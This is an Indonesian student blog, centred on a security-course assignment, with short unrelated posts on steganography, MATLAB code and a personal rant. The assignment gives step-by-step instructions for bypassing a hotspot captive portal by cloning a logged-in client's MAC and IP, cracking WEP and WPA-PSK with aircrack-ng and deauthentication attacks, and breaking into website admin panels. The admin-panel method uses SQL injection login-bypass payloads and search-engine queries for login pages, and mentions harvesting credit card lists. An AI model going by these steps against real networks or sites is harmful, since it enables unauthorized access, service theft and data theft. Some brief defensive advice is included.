Selasa, 25 Januari 2011

Keamanan Wireless

Tugas Mata Kuliah Sistem Keamanan

Dosen : Rahmatul Irfan, M.T.

1. Carilah cara untuk melakukan pembobolan Captive Portal

2. Carilah cara untuk melakukan pembobolan WEP Encryption

3. Carilah cara untuk melakukan pembobolan WPA Encryption

4. Carilah cara untuk melakukan pembobolan WPA-PSK Encryption

5. Menurut anda bagaimana cara mengamankan jaringan wireless?

Jawab :

1. Cara membobol Captive Portal

Captive Portal merupakan suatu teknik autentikasi dan pengamanan data yang lewat dari network internal ke network eksternal. Captive portal sebenarnya merupakan mesin router atau gateway yang memproteksi atau tidak mengizinkan adanya trafik, sehingga user melakukan registrasi. Biasanya Captive Portal digunakan pada infrastruktur wireless seperti hotspot area, tapi tidak menutup kemungkinan untuk diterapkan pada jaringan kabel.

Infrastruktur Captive Portal awalnya didesign untuk keperluan komunitas yang memungkinkan semua orang dapat terhubung (open network). Captive portal sebenarnya merupakan mesin router atau gateway yang memproteksi atau tidak mengizinkan adanya trafik hingga user melakukan registrasi/otentikasi. Berikut cara kerja captive portal :

• user dengan wireless client diizinkan untuk terhubung wireless untuk mendapatkan IP address (DHCP).

• block semua trafik kecuali yang menuju ke captive portal (Registrasi/Otentikasi berbasis web) yang terletak pada jaringan kabel.

• redirect atau belokkan semua trafik web ke captive portal
• setelah user melakukan registrasi atau login, izinkan akses ke jaringan (internet)
Beberapa hal yang perlu diperhatikan, bahwa captive portal hanya melakukan tracking koneksi client berdasarkan IP dan MAC address setelah melakukan otentikasi. Hal ini membuat captive portal masih dimungkinkan digunakan tanpa otentikasi karena IP dan MAC adress dapat dispoofing. Serangan dengan melakukan spoofing IP dan MAC. Spoofing MAC adress seperti yang sudah dijelaskan pada bagian 4 diatas. Sedang untuk spoofing IP, diperlukan usaha yang lebih yakni dengan memanfaatkan ARP cache poisoning, kita dapat melakukan redirect trafik dari client yang sudah terhubung sebelumnya. Serangan lain yang cukup mudah dilakukan adalah menggunakan Rogue AP, yaitu mensetup Access Point (biasanya menggunakan HostAP) yang menggunakan komponen informasi yang sama seperti AP target seperti SSID, BSSID hingga kanal frekuensi yang digunakan. Sehingga ketika ada client yang akan terhubung ke AP buatan kita, dapat kita membelokkan trafik ke AP sebenarnya. Tidak jarang captive portal yang dibangun pada suatu hotspot memiliki kelemahan pada konfigurasi atau design jaringannya. Misalnya, otentikasi masih menggunakan plain text (http), managemen jaringan dapat diakses melalui wireless (berada pada satu network), dan masih banyak lagi. Kelemahan lain dari captive portal adalah bahwa komunikasi data atau trafik ketika sudah melakukan otentikasi (terhubung jaringan) akan dikirimkan masih belum terenkripsi, sehingga dengan mudah dapat disadap oleh para hacker. Untuk itu perlu berhati-hati melakukan koneksi pada jaringan hotspot, agar mengusahakan menggunakan komunikasi protokol yang aman seperti https,pop3s, ssh, imaps dst.

Cara membobol captive porta dicontohkan pada jaringan hotspot atau wifi pada warnet(warung internet), tentunya anda harus membeli voucher yang sudah ada username dan password yang mungkin harganya berkisar 3 sampai 5.000 perjamnya. Biasanya hospot yang ini memakai mikrotik. Biasanya kalau kita terhubung dengan hotspot mikrotik maka kita akan dihadapkan dengan menu mikrotik login sebelum kita bisa browsing. Tampilan mikrotik kira kira seperti ini

Cara ini adalah untuk mem-by pass mikrotik login, sebenarnya lebih tepat kalau disebut cloning client. Intinya kita tidak harus login dulu untuk bisa browsing, karena target sudah login. Kita sebagai clone-nya jadi tidak perlu login. Trik ini hanya bisa jalan selama client yang kita clone masih terhubung ke hotspot.

Berikut langkah-langkahnya :


1. Download dulu program Netcut, program ini untuk mengetahui MAC address yang terhubung dengan kita. Netcut bisa didownload
DISINI. (disini pemakaian netcut bukan untuk memutuskan jaringan orang, tapi untuk mencari IP adress dan mac address
2. Koneksikan komputer kita dengan hotspot mikrotik

3. Jalankan program Netcut

4. Pilih LAN Card / NIC yang kita gunakan dengan mengklik menu Choice NetCard

5. Kemudian klik OK kembali ke layar utama, pilih salah satu network yang terkoneksi. Yang jelas bukan network kita atau network server.

6. Salin IP address dan MAC address, bisa juga dengan mengklik PrintTable kemudian blok dan copy paste ke notepad untuk langkah selanjutnya.

7. Setelah dipaste di notepad langkah selanjutnya edit nilai MAC address, pada contoh ini [00:26:5E:60:81:1C]. Hilangkan tanda [:] sehingga menjadi 00265E60811C. Nilai ini yang akan kita gunakan untuk merubah MAC address kita.
8. Selanjutnya kita disable dulu wireless LAN kita. Kemudian buka properties wireless LAN dan ubah nilai Local Administration MAC Network, default kosong. Isi dengan nilai tadi, pada contoh ini 00265E60811C

9. Kemudian kita set IP wireless LAN kita dengan IP yang sama yaitu 192.168.182.18 dan isi juga DNS server address.


Untuk DNS server address bisa dicek sebelum kita merubah MAC dan IP. Jadi waktu pertama kali kita terhubung ke hotspot, dengan cara mengetik perintah dari command prompt
C:\>ipconfig/all

10. Langkah terakhir adalah meng-enable kembali wireless LAN kita. Sekarang kita bisa browsing tanpa harus ijin pada yang punya hotspot.

11. Hasil :

Sebelum melakukan clone

Sesudah melakukan clone

\

2. Cara membobol WEP

WEP adalah Wired Eqivalent Privacy, yang panjang key 64 bitnya hanya 10 digit bilangan heksadesimal atau 5 digit alpha-numeric, sedangkan untuk 128 bit key terdiri dari 26 digit heksadesimal atau 13 digit alpha-numeric

Cara membobol WEP menggunakan BackTrack :

1. Jalankan OS Back Track v.2.0 Final dengan Laptop. Lalu cek konfigurasi adapater usb wifi dengan menggunakan shell. Ketikkan:

Ifconfig rausb0

Iwconfig rausb0

2. Setelah konfigurasi selesai, lalu jalankan airodump-ng untuk mengetahui channel berapa yang aktif, apa nama ssidnya, mac /client berapa saja yang sudah konek, ada tidaknya filrtering mac, yang tentunya untuk memudahkan kita melakukan monitoring dengan menggunakan shell ketikkan:

airodump-ng rausb0

3. Setelah mengetahui target berada di channel berapa, ssid nya apa, essid nya apa, ada tidaknya client yang konek, maka batalkan airodump-ng dari shell dengan menekan control+C. lalu misalnya kita ingin menyerang essid CIPUTIH bssid 00:18:f8:36:83:47 operasinya di channel 8, maka untuk menangkap paket yang dipancarkan oleh AP (Access Point) tersebut maka jalankan perintah:
iwconfig rausb0 mode monitor channel 8

airodump-ng -- channel 8 --ivs -w namafile rausb0

4. shell ini jangan ditutup sampai mendapatkan key wep pada langkah aircrack-ng

5. Setelah itu, jika aktivitas lan sedikit, artinya tidak ada client yang connect, harus menggunakan Fake Authentification dengan membuka shell baru, lalu ketikkan:
Aireplay-ng -1 -30 -e CIPUTIH “a 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0

6. Lakukan fake authentification sampai muncul balasan jawaban:Authentification successful Keep live sending packet. Lakukan terus sampai mendapatkan key WEP pada langkah aircrack-ng

7. Lalu jalan shell yang lain untuk melakukan injeksi arp request (dalam hal ini hanya card tertentu saja yang mendukung untuk melakukan injeksi), jalankan command:
Aireplay-ng -3 “b 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0
Lalu tinggal menunggu agar paket arp injeksi terkirim dan paket arp request diterima, paket yang diterima berupa paket ivs ini akan tersimpan dalam file pertama tadi di atas ketika menjalan shell airodump-ng -- channel 8 --ivs -w namafile rausb0

8. Untuk ngecrack password wep, sambil menunggu paket yang terkumpul, jalan shell baru ketikkan

aircrack-ng “e CIPUTIH -b 00:18:f8:36:83:47 (namafile).

9. Ivs lalu aircrack-ng ini akan mencari semua kemungkinan key wepnya. Tunggu sampai mendapat display. Key Found (B1:92:27:EF:6E) Probability 100%

10. Matikan shell airodump-ng, aireplay-ng, lalu buka shell baru. Lalu lakukan otentifikasi dengan cara:

iwconfig rausb0 mode managed “ CIPUTIH key B1:92:27:EF:6E
lalu lakukan otomatisasi dhcp dengan mengetikkan perintah:

dhcpcd rausb0

lalu lakukan ping ke salah satu web site misalnya:ping yahoo.com

3. Cara Membobol WPA

Buka Kunci WPA dengan spoonwpa

Pada dasarnya proses cracking kunci wpa dengan spoonwpa sama dengan cracking wep dengan spoonwep cuma bedanya ketika sudah mendapatkan atau sudah menangkap data maka proses penangkapan berhenti yang kemudian kita lanjutkan denga proses pembongkaran.

Pembongkaran dari hasil penangkapan inilah yang sangat membedakan antara sponwep dengan spoonwpa. Untuk spoonwep data yang terkumpul sebagai hasil dari penangkapan signal yang mencapai 20.000 data lebih itu di cocokan pada saat kita masih terhubung denga bssid, namun untuk cracking wpa ketika penangkapan sudah berhasil maka kita bisa memutuskan hubungan dengan bssid untuk selanjutnya kita mencocokan hasil penangkapan dengan daftar nama atau nomor campuran huruf dengan angka ataupun dengan simbol. Ketemu atau tidak ketemu kunci wpa tergantung dengan word list yang kita punya.

Dan gambar di bawah ini adalah contoh cracking dengan spoonwpa.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxVOvYaW4G34sDFM6A8z_ZUafRY41BkEa7979l1aWi-MPrT90Pnw1zX76zh4IbJSqz7I7Y6YSCVTjObDqj0uJ51phG49u9q-wJsjX02ZMwnXUZG20HO0HcfDqqhtGX4fYokv9hMOh5vTBU/s320/snapshot1.png

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDLZUUWgkoiYk07MWBPpbM1FCGbElog_aZ20Pq1aPxFpa5rYjTeq5M4uSJTKRsmhmCVoIfp28-_TaABUMqTuHazwn7VUrEiFjSjzMg_kwY9KLNbGWcTJbDE7YNJA0TA3ijnuWrr2zbayNj/s320/snapshot2.png


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKNR7dt0j6tetpKgGAiqyIVFjO72PqGRot22Kt3-4I6JBr3f_B0GSHC5FQZXA7VT19nYNm1oKFpWsMdk4Rfk2nywh5vQbsbaAO0DtV5zG4oF5SZwaqAvoZzzcwmzVURZBGlRYsBj4rOKOZ/s320/snapshot3.png

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbBHdL1WFK54LrBlpW_ygt-7JpmDSctFtK9pXoz5_vJGLMBLyuCNvnaoXlNC5-2bM1C6rLIBL6bIy_wx9k-XdSQXyNGCm4W8C9y2qWvMifAtMEm4IWIUfrByWnzVfFytJCuG2MZDRZd9v3/s320/snapshot4.png

Sebagai contoh saya melakukan captured pada salah satu bssid dan hasil penangkapan adalah 123123123. Perlu diketahui bahwa kita tidak tahu bssid tersebut mempunyai password 123123123 airodump-ng hanya menangkap sebuah signal yang kemudian akan divisualisasikan dengan cara mencocokan signal hasil tangkapan dengan daftar kata yang kita miliki yang ternyata adalah 123123123. Kalau wordlist yang kita punya tidak ada 123123123 maka proses cracking tidak akan berhasil karena signal yang ditangkap tidak menemukan bentuk yang sama pada wordlist.

Jadi kesimpulannya untuk crcking wpa, berhasil atau tidaknya kita melakukan cracking tergantung pada wordlist maka dari itu kita perlu kretif membuat kata atau nomor urut sesuai dengan kebutuhan.

4. Cara membobol WPA-PSK

WPA-PSK (Wi-Fi Protected Access – Pre Shared Key)

Adalah pengamanan jaringan nirkabel dengan menggunakan metoda WPA-PSK jika tidak ada authentikasi server yang digunakan. Dengan demikian access point dapat dijalankan dengan mode WPA tanpa menggunakan bantuan komputer lain sebagai server. Cara mengkonfigurasikannya juga cukup sederhana. Perlu diketahui bahwa tidak semua access point akan mempunyai fasilitas yang sama dan tidak semua access point menggunakan cara yang sama dalam mendapatkan Shared-Key yang akan dibagikan ke client.

Pada access point Dlink DWL-2000AP, pemberian Shared-Key dilakukan secara manual tanpa mengetahui algoritma apa yang digunakan. Keadaan ini berbanding terbalik dengan access point Linksys WRT54G, dimana administrator dapat memilih dari dua algoritma WPA yang disediakan, yang terdiri dari algoritma TKIP atau algoritma AES.

Setelah Shared-Key didapat, maka client yang akan bergabung dengan access point cukup memasukkan angka/kode yang diijinkan dan dikenal oleh access point. Prinsip kerja yang digunakan WPA-PSK sangat mirip dengan pengamanan jaringan nirkabel dengan menggunakan metoda Shared-Key.

1. Tutorial Cara Cracking Password Hotspot WPA-PSK Dengan Linux Ubuntu

Setelah sedikit mengetahui wpa-psk, maka selanjutnya kita akan mencoba untuk cracking wpa-psk tersebut. Cara ini bisa menggunakan linux backtrack 4 final release atau linux apapun tertama asal sudah terinstall aplikasi aircrack-ng. Nda berlama-lama mari simak artikel berikut.

1. Siapkan CD Live Backtrack atau bisa make linux ubuntu dengan menginstall aplikasi aircrack-ng. Ketik perintah di bawah untuk menginstall aircrack-ng di linux ubuntu

sudo apt-get install aircrack-ng

2. Masuk ke dekstop dengan perintah ~# startx (untuk yang make backtrack)

3. Buka konsole (terminal) dan ketikkan perintah untuk melihat interface device yang ada


sudo su

ifconfig -a

4. Ketikkan perintah di bawah untuk mengaktifkan interface wlan0


ifconfig wlan0 up


5. Sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual interface mode monitor dengan mengetikkan perintah di bawah.


airmon-ng start wlan0


6. monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.


airodump-ng mon0

cat : mon0 adalah interface virtual hasil dari airmon-ng tadi

7. fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.


airodump-ng -w coba –channel 11 –bssid 001122334455 mon0


ket: memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama ‘coba’ Selanjutnya, gunakan serangan dengan cara disconnect salah satu client untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking

aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0


ket: aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking -0 : mode serangan deAuthentication 1 : dilakukan sebanyak 1x deAuth Terakhir, setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah


aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt


ket : listpass.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/listpass.txt


Keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya. Jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang kita miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal

Atau dapat juga dengan cara ini:

Setting wireless card pada monitor mode

airmon-ng stop ath0
airmon-ng start wifi0 7


* 7 = channel of AP

Lihat dan ambil paket menjadi sebuah file menggunakan airodump-ng

airodump-ng -w psk -c 7 --bssid 00:18:F6:AC:11:13 ath0

-w = Capture file (usally saved to root)
-c = channel of AP
--bssid = AP mac address
ath0 = your wireless card mac address


aireplay-ng -0 1 -a 00:18:F6:AC:11:13 -h 00:20:A6:60:E4:00 ath0

-0 = deauth client
-a = bssid
-h = your mac (source)


Ketika paket sudah didapatkan, crack dengan aircrack-ng

aircrack-ng -w dictionary.txt -b 00:18:F6:AC:11:13 psk.cap

-w = Your dictionary file
-b = bssid (AP mac address)
psk.cap = your capture file

5. Bagaimana mengamankan jaringan wireless

Jaringan wireless merupakan jaringan internet tanpa kabel yang dapat dishare oleh beberapa user, sehingga user dapat menikmati fasilitas internet secara luas dan bebas. Jaringan wireless ini biasanya diamankan dengan password sehingga yang dapat mengakses internet hanya user-user yang mengetahui passwordnya.

Akan tetapi, saat ini makin banyak yang berusaha membobol jaringan wireless tersebut supaya dapat memperoleh akses internet tanpa harus menggunakan password.

Cara untuk menghindari adanya pembobolan jaringan wireless, mungkin dengan cara mendaftarkan semua komputer/laptop client (MAC Address), supaya dapat dideteksi apakah user tersebut merupakan anggota dari suatu jaringan wireless atau bukan.

Atau dengan menggunakan captive portal, dengan captive portal semua user harus log in terlebih dahulu sebelum mengakses jaringan internet wireless. Selain itu setiap user yang terdaftar MAC Addressnya mendapatkan UserID dan password yang berbeda-beda, sehingga user yang tidak atau belum mendaftarkan MAC Addressnya tidak dapat log in dan menikmati akses internet wireless.

Dan yang terakhir adalah mengaktifkan fitur Proxy dan fitur Firewall yang sudah terintegrasi pada Sistem Operasi Server Linux. Serta menggunakan pengamanan berlapis pada seting Linux maupun lainnya seperti mikrotik.

steganografi

Steganografi

Menyembunyikan dalam pesan lain
Lupakan asal rumor itu,jaga agar matamu sehat aku turunkan ubanmu.
Information hiding degan Steganografi
Steganography = ilmu dan seni menyembunyikan informasi dengan cara menyisipkan pesan didalam pesan lain

Steganografi digital : steganografi pada data digital dengan menggunakan computer digital
Property ) : pesan ySteganografy :
1. Embedded message (hidden text) : pesan yang disembunyikan
2. Cover-Object (covertext : pesan yang digunakan untuk menyembunyikan embedded message
3. Stego-object : pesan yg sudah berisi embedded message
4. Stego key : kunci untuk menyisipkan pesan dan ekstraksi dari stegotext

Stegan ografi dan Kriptografi
Steganografi menyemarkan pesan
Kriptografi menyembunyikan pesan

Kriteria Steganografy yang bagus
1. Imperceptible : keberadaan pesan rahasia tidak dapat dipersepsi
2. Fidelity : mutu cover object tidak boleh berub ah
3. Recovery : data dapat dikembalikan

SQL injection


Tugas Mata Kuliah Sistem Keamanan
Dosen : Rahmatul Irfan, M.T.

1. Carilah apa itu SQL InjectionJawab :

Pengertian SQL Injection1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Sebab terjadinya SQL Injection1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.Bug SQL Injection berbahaya ?1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.Apa saja yang diperlukan untuk melakukan SQL Injection ?1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice
Contoh sintaks SQL InjectionContoh sintak SQL dalam PHP1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL
Gambar contoh SQL Injection
Contoh sintaks SQL Injection1) Sintaks SQL string ‘-- setelah nama username
2) Query database awal :
Berubah menjadi :


Contoh sintaks SQL Injection
SQL Injection melalui URL, contohnya :

Penanganan SQL Injection
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php
Contoh script php semula :
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :

Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :


3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :


Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}


3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.


Sumber :
1) -------------, SQLinjection, (www.BlackAngels.it).
2) -------------, Advanced SQL injection in SQL server applications, (www.ngssoftware.com).
3) -------------, SQL injection walktrough (www.securiteam.com).
4) BM-100, ”Hacking hiltonjakarta.com (SQL Injection)”, 24 Juli 2005, (http://www.jasakom.com).
5) Budi Raharjo, ”Keamanan Sistem Informasi Berbasis Internet”, PT Insan Indonesia & PT INDOCISC, Jakarta,2002.

Minggu, 23 Januari 2011

UAS praktek MATLAB

clear all;
utama=figure(1);
set(utama,'NumberTitle','off','name','UAS - 08520244050_Nike Dwi Noviani','menubar','none','color','blue');
global x;
global y;
global z;

%tombol volume
volume=uicontrol(utama,'style','slider','position',[100 60 250 30],...
'max',1,'min',0,'value',0.5);

%tombol play
play=uicontrol(utama,'style','push','position',[20 60 70 40],'string',...
'play','callback','z=sound_08520244050(y,get(volume,''value''));');

%input tampilan teks
txt=uicontrol(utama,'style','edit','position',[200 180 170 20]);

%tombol read
tombolread=uicontrol(utama,'style','push','position',[20 140 70 40],...
'string','read');

%tombol keluar
tombolexit=uicontrol(utama,'style','push','position', [20 20 70 40],...
'string','exit','callback','keluar_08520244050(utama)');

%tombol plot
tombolplot=uicontrol(utama,'style','push','position',[20 100 70 40],...
'string','plot','callback','z=plot_08520244050(y,get(volume,''value''));');

%label read
label_read=uicontrol(utama,'style','text','position',[100 150 100 25]);

%label volume
label_volume=uicontrol(utama,'style','text','position',[360 60 50 25],'string','50');

%label matlab
label_matlab=uicontrol(utama,'style','text','position',[495 10 50 20],'string','UAS');

%label namasuara
label_namasuara=uicontrol(utama,'style','text','position',[200 200 170 20],'string','Masukan Suara :');

%set callback
set(tombolread,'callback','x=get(txt,''string''); [y,fs,n]=wavread(x);i=size(y); set(label_read,''string'',i);');
set(volume,'callback','z=plot_08520244050(y,get(volume,''value''));set(label_volume,''string'',get(volume,''value'')*100);');

Senin, 20 Desember 2010

jawab note orang..



haha..
suka ga abis pikir ama jalan pikiran mereka..

yg pasti karma tuh ada..
makax jd mnusia jgn blagu..
sok cakep.. manggil sayang ,, bebh,, honey sana sini..
nah skrg? apa akibatx?
qm sndiri yg ngrasain..

gra2 dah liat webcam lgsg pegi..hha
ktauan bgt qm cm liat paras sseorang,,blgx cm liat hati..
that's all bulshit!

lips n heart are different..

makan tuh pemberi motivasi,,
qlo blum bisa mnghargai org lain jgn sombong..

bnerin dlu jalan pikiran lw tuh..

fokus ama 1 hal,,jgn kbnyakan melenceng..!!

smua ad akibatx!

pikir baik2 sbelum bertindak n mngambil kputusan!!

I hope u will be good person n get a girl what u want..

Minggu, 19 Desember 2010

Link Lengkap

http://digilib.unnes.ac.id/gsdl/collect/skripsi/archives/HASH80e1.dir/doc.pdf
=> link skripsi

Sabtu, 18 Desember 2010